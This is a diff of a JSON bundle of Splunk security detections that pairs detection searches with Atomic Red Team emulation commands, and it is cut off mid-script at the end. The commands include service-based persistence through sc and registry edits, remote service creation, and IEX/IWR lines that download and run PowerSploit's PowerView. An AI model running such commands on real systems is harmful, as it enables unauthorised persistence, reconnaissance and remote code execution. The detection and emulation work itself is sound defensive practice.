`security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", "tags": { "name": "Detect SharpHound File Modifications", "analytic_story": [ @@ -174472,7 +176312,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -177781,10 +179621,10 @@ ], "command_list": [ "sc config Fax binPath= \"C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noexit -c \\\"write-host 'T1543.003 Test'\\\"\"\nsc start Fax\n", - "sc.exe create AtomicTestService_CMD binPath= \\T1543.003\\bin\\AtomicService.exe start=auto type=Own\nsc.exe start AtomicTestService_CMD\n", + "sc.exe create AtomicTestService_CMD binPath= \"\\T1543.003\\bin\\AtomicService.exe\" start=auto type=Own\nsc.exe start AtomicTestService_CMD\n", "New-Service -Name \"AtomicTestService_PowerShell\" -BinaryPathName \"\\T1543.003\\bin\\AtomicService.exe\"\nStart-Service -Name \"AtomicTestService_PowerShell\"\n", - "copy \\T1543.003\\bin\\w64time.dll %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", - "sc.exe \\\\localhost create AtomicTestService_CMD binPath= \\T1543.003\\bin\\AtomicService.exe start=auto type=Own\nsc.exe \\\\localhost start AtomicTestService_CMD\n", + "copy \"\\T1543.003\\bin\\w64time.dll\" %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", + "sc.exe \\\\localhost create AtomicTestService_CMD binPath= \"\\T1543.003\\bin\\AtomicService.exe\" start=auto type=Own\nsc.exe \\\\localhost start AtomicTestService_CMD\n", "$s = Get-Service -Name #{host.service.modifiable};\nif ($s.status -ne 'Stopped') { Stop-Service $s };\n$exe = (Get-ItemProperty -Path \"HKLM:\\System\\CurrentControlSet\\Services\\#{host.service.modifiable}\").ImagePath.split()[0];\n$path = (Resolve-Path $exe).Path;\nCopy-Item -Path $path -Destination ($path + \".saved\");\nCopy-Item -Path \"C:\\Windows\\System32\\snmptrap.exe\" -Destination $path\n" ], "commands": [], @@ -177844,14 +179684,14 @@ "dependencies": [ { "description": "Service binary must exist on disk at specified location (#{binary_path})\n", - "prereq_command": "if (Test-Path #{binary_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" + "prereq_command": "if (Test-Path \"#{binary_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{binary_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" } ], "executor": { "name": "command_prompt", "elevation_required": true, - "command": "sc.exe create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}\nsc.exe start #{service_name}\n", + "command": "sc.exe create #{service_name} binPath= \"#{binary_path}\" start=#{startup_type} type=#{service_type}\nsc.exe start #{service_name}\n", "cleanup_command": "sc.exe stop #{service_name} >nul 2>&1\nsc.exe delete #{service_name} >nul 2>&1\n" } }, @@ -177878,8 +179718,8 @@ "dependencies": [ { "description": "Service binary must exist on disk at specified location (#{binary_path})\n", - "prereq_command": "if (Test-Path #{binary_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" + "prereq_command": "if (Test-Path \"#{binary_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{binary_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" } ], "executor": { @@ -177904,7 +179744,7 @@ } }, "executor": { - "command": "copy #{dllfilename} %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", + "command": "copy \"#{dllfilename}\" %systemroot%\\system32\\\nsc create W64Time binPath= \"c:\\Windows\\System32\\svchost.exe -k TimeService\" type= share start=auto\nsc config W64Time DisplayName= \"Windows 64 Time\"\nsc description W64Time \"Maintain date and time synch on all clients and services in the network\"\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /t REG_MULTI_SZ /d \"W64Time\" /f\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /t REG_EXPAND_SZ /d \"%systemroot%\\system32\\w64time.dll\" /f\nsc start W64Time", "cleanup_command": "sc stop W64Time\nsc.exe delete W64Time\ndel %systemroot%\\system32\\w64time.dll\nreg delete \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v TimeService /f\nreg delete \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\W64Time\\Parameters\" /v ServiceDll /f", "name": "command_prompt", "elevation_required": true @@ -177948,14 +179788,14 @@ "dependencies": [ { "description": "Service binary must exist on disk at specified location (#{binary_path})\n", - "prereq_command": "if (Test-Path #{binary_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{binary_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" + "prereq_command": "if (Test-Path \"#{binary_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{binary_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe\" -OutFile \"#{binary_path}\"\n" } ], "executor": { "name": "command_prompt", "elevation_required": true, - "command": "sc.exe \\\\#{remote_host} create #{service_name} binPath= #{binary_path} start=#{startup_type} type=#{service_type}\nsc.exe \\\\#{remote_host} start #{service_name}\n", + "command": "sc.exe \\\\#{remote_host} create #{service_name} binPath= \"#{binary_path}\" start=#{startup_type} type=#{service_type}\nsc.exe \\\\#{remote_host} start #{service_name}\n", "cleanup_command": "sc.exe \\\\#{remote_host} stop #{service_name} >nul 2>&1\nsc.exe \\\\#{remote_host} delete #{service_name} >nul 2>&1" } } @@ -178522,7 +180362,7 @@ { "name": "CMD Echo Pipe - Escalation", "description": "This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\\\.\\Pipe\\5erg53`.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter`", "tags": { "name": "CMD Echo Pipe - Escalation", "analytic_story": [ @@ -179660,7 +181500,7 @@ "Installation", "Exploitation" ], - "message": "Services.exe spawned a LOLBAS process on $dest", + "message": "Services.exe spawned a LOLBAS process on $dest$", "mitre_attack_id": [ "T1543", "T1543.003" @@ -179814,7 +181654,7 @@ { "name": "Windows KrbRelayUp Service Creation", "description": "The following analytic identifies the default service name created by KrbRelayUp. Defenders should be aware that attackers could change the hardcoded service name of the KrbRelayUp tool and bypass this detection.", - "search": "`wineventlog_system` EventCode=7045 Service_Name IN (\"KrbSCM\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Service_File_Name Service_Name Service_Start_Type Service_Type | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_krbrelayup_service_creation_filter`", + "search": "`wineventlog_system` EventCode=7045 Service_Name IN (\"KrbSCM\") | stats count min(_time) as firstTime max(_time) as lastTime by dest EventCode Service_File_Name Service_Name Service_Start_Type Service_Type | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_krbrelayup_service_creation_filter`", "tags": { "name": "Windows KrbRelayUp Service Creation", "analytic_story": [ @@ -179914,7 +181754,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -184043,7 +185883,7 @@ "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose\n", "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName $env:COMPUTERNAME -Verbose\"\n", "get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq $TRUE}\n", - "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=group)\n", + "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=group)\n", "Get-AdGroup -Filter *\n", "([adsisearcher]\"objectcategory=group\").FindAll(); ([adsisearcher]\"objectcategory=group\").FindOne()\n", "Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name\n", @@ -184187,12 +186027,12 @@ "dependencies": [ { "description": "AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe)\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe) -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\"\n" } ], "executor": { - "command": "PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe -f (objectcategory=group)\n", + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\AdFind.exe\" -f (objectcategory=group)\n", "name": "command_prompt" } }, @@ -184546,7 +186386,7 @@ { "name": "Detect AzureHound Command-Line Arguments", "description": "The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN (\"*invoke-azurehound*\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter`", "tags": { "name": "Detect AzureHound Command-Line Arguments", "analytic_story": [ @@ -184718,7 +186558,7 @@ { "name": "Detect AzureHound File Modifications", "description": "The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*-azurecollection.zip\", \"*-azprivroleadminrights.json\", \"*-azglobaladminrights.json\", \"*-azcloudappadmins.json\", \"*-azapplicationadmins.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter`", "tags": { "name": "Detect AzureHound File Modifications", "analytic_story": [ @@ -185035,7 +186875,7 @@ { "name": "Detect SharpHound File Modifications", "description": "SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN (\"*bloodhound.zip\", \"*_computers.json\", \"*_gpos.json\", \"*_domains.json\", \"*_users.json\", \"*_groups.json\", \"*_ous.json\", \"*_containers.json\") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user| `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_file_modifications_filter`", "tags": { "name": "Detect SharpHound File Modifications", "analytic_story": [ @@ -185071,7 +186911,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -185346,7 +187186,7 @@ { "name": "Domain Group Discovery with Adsisearcher", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the `[Adsisearcher]` type accelerator being used to query Active Directory for domain groups. Red Teams and adversaries may leverage `[Adsisearcher]` to enumerate domain groups for situational awareness and Active Directory Discovery.", - "search": "`powershell` EventCode=4104 (Message = \"*[adsisearcher]*\" AND Message = \"*(objectcategory=group)*\" AND Message = \"*findAll()*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | `security_content_ctime(firstTime)` | `domain_group_discovery_with_adsisearcher_filter`", + "search": "`powershell` EventCode=4104 (Message = \"*[adsisearcher]*\" AND Message = \"*(objectcategory=group)*\" AND Message = \"*findAll()*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message ComputerName User | rename ComputerName as dest |rename User as user | `security_content_ctime(firstTime)` | `domain_group_discovery_with_adsisearcher_filter`", "tags": { "name": "Domain Group Discovery with Adsisearcher", "analytic_story": [ @@ -186142,7 +187982,7 @@ { "name": "GetWmiObject Ds Group with PowerShell Script Block", "description": "The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of the `Get-WmiObject` commandlet used with specific parameters . The `DS_Group` parameter leverages WMI to query for all domain groups. Red Teams and adversaries may leverage this commandlet to enumerate domain groups for situational awareness and Active Directory Discovery.", - "search": "`powershell` EventCode=4104 (ScriptBlockText=*Get-WmiObject* AND ScriptBlockText=\"*namespace root\\\\directory\\\\ldap*\" AND ScriptBlockText=\"*class ds_group*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `getwmiobject_ds_group_with_powershell_script_block_filter`", + "search": "`powershell` EventCode=4104 (ScriptBlockText=*Get-WmiObject* AND ScriptBlockText=\"*namespace root\\\\directory\\\\ldap*\" AND ScriptBlockText=\"*class ds_group*\") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`|`getwmiobject_ds_group_with_powershell_script_block_filter`", "tags": { "name": "GetWmiObject Ds Group with PowerShell Script Block", "analytic_story": [ @@ -186155,7 +187995,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Domain group discovery enumeration using PowerShell on $Computer$ by $UserID$", + "message": "Domain group discovery enumeration using PowerShell on $dest$ by $user$", "mitre_attack_id": [ "T1069", "T1069.002" @@ -188934,6 +190774,53 @@ } ] } + }, + { + "name": "Splunk DOS via printf search function", + "description": "This hunting search provides information on detecting a vulnerability In Splunk Enterprise versions lower than 8.1.14, 8.2.12, 9.0.6, and 9.1.1, an attacker can use the printf SPL function to perform a denial of service against the Splunk Enterprise instance.", + "search": "`audit_searches` \"*makeresults * eval * fieldformat *printf*\" user!=\"splunk_system_user\" search!=\"*audit_searches*\" | stats count by user splunk_server host search | convert ctime(*time) |`splunk_dos_via_printf_search_function_filter`", + "tags": { + "name": "Splunk DOS via printf search function", + "analytic_story": [ + "Splunk Vulnerabilities" + ], + "asset_type": "endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Actions on Objectives" + ], + "message": "Possible denial of service attack against $host$", + "mitre_attack_id": [ + "T1499.004" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "host", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 100, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1499.004", + "mitre_attack_technique": "Application or System Exploitation", + "mitre_attack_tactics": [ + "Impact" + ], + "mitre_attack_groups": [] + } + ] + } } ], "external_reference": [ @@ -189819,14 +191706,14 @@ } ], "command_list": [ - "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \\T1218.004\\src\\InstallUtilTestHarness.ps1\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'CheckIfInstallable'\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nCheckIfInstallable method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", - "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \\T1218.004\\src\\InstallUtilTestHarness.ps1\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'InstallHelper'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallHelper method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", - "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \\T1218.004\\src\\InstallUtilTestHarness.ps1\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs -MinimumViableAssembly\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil class constructor execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", - "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \\T1218.004\\src\\InstallUtilTestHarness.ps1\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /installtype=notransaction /action=install `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Install_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Install method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", - "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \\T1218.004\\src\\InstallUtilTestHarness.ps1\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /U `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Uninstall_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", - "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \\T1218.004\\src\\InstallUtilTestHarness.ps1\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/logfile= /logtoconsole=false /installtype=notransaction /action=uninstall `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_Uninstall_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil Uninstall method execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", - "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \\T1218.004\\src\\InstallUtilTestHarness.ps1\n\n$InstallerAssemblyDir = \"$Env:TEMP\\\"\n$InstallerAssemblyFileName = \"T1218.004.dll\"\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"/? `\"$InstallerAssemblyFullPath`\"\"\n$ExpectedOutput = 'Constructor_HelpText_'\n\n$TestArgs = @{\n OutputAssemblyDirectory = $InstallerAssemblyDir\n OutputAssemblyFileName = $InstallerAssemblyFileName\n InvocationMethod = 'Executable'\n CommandLine = $CommandLine\n}\n\n$ActualOutput = Invoke-BuildAndInvokeInstallUtilAssembly @TestArgs\n\nif ($ActualOutput -ne $ExpectedOutput) {\n throw @\"\nInstallUtil HelpText property execution test failure. Installer assembly execution output did not match the expected output.\nExpected: $ExpectedOutput\nActual: $ActualOutput\n\"@\n}\n", - "# Import the required test harness function, Invoke-BuildAndInvokeInstallUtilAssembly\n. \\T1218.004\\src\\InstallUtilTestHarness.ps1\n\n$InstallerAssemblyDir = \"$Env:windir\\System32\\Tasks\"\n$InstallerAssemblyFileName = 'readme.txt'\n$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName\n\n$CommandLine = \"readme.txt\"\n$ExpectedOutput = 'Constructor_'\n\n# Explicitly set the directory so that a relative path to readme.txt can be supplied.\nSet-Location \"$Env:windir\\System32\\Tasks\"\n\nCopy-Item -Path 